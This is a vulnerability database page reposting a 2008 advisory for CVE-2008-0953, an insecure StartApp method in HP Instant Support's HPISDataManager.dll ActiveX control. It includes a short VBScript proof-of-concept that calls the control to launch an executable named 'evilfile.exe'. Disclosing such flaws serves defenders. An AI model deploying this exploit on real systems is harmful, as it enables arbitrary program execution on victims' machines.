Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2008-0953

Publish Date: 03 Jun 2008

                							

                source: http://www.securityfocus.com/bid/29533/info


HP Instant Support 'HPISDataManager.dll' ActiveX control is prone to an insecure-method vulnerability.

Successfully exploiting this issue allows remote attackers to launch arbitrary applications with the privileges of the application running the ActiveX control (typically Internet Explorer).

Note that if the attacker could place a malicious executable on the system, they would be able to launch it using this vulnerability.

HP Instant Support 1.0.0.22 and earlier versions are affected.

NOTE: This issue was previously covered in BID 29526 (HP Instant Support 'HPISDataManager.dll' ActiveX Control Unspecified Code Execution Vulnerabilities), but has been given its own record because of new information. 

&lt;?XML version='1.0' standalone='yes' ?&gt; &lt;package&gt;&lt;job id='DoneInVBS' debug='false' error='true'&gt; &lt;object classid='clsid:14C1B87C-3342-445F-9B5E-365FF330A3AC' id='target' /&gt; &lt;script language='vbscript'&gt; 'for debugging/custom prolog targetFile = "C:\WINDOWS\Downloaded Program Files\HPISDataManager.dll" prototype = "Function StartApp ( ByVal appName As String ) As String" memberName = "StartApp" progid = "HPISDataManagerLib.Datamgr" argCount = 1 arg1="c:\evilfile.exe" target.StartApp arg1 &lt;/script&gt;&lt;/job&gt;&lt;/package&gt;

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

HP Instant Support 1.0.22 - 'HPISDataManager.dll StartApp' ActiveX Control Insecure Method

Vulmon Search

About

Products

Connect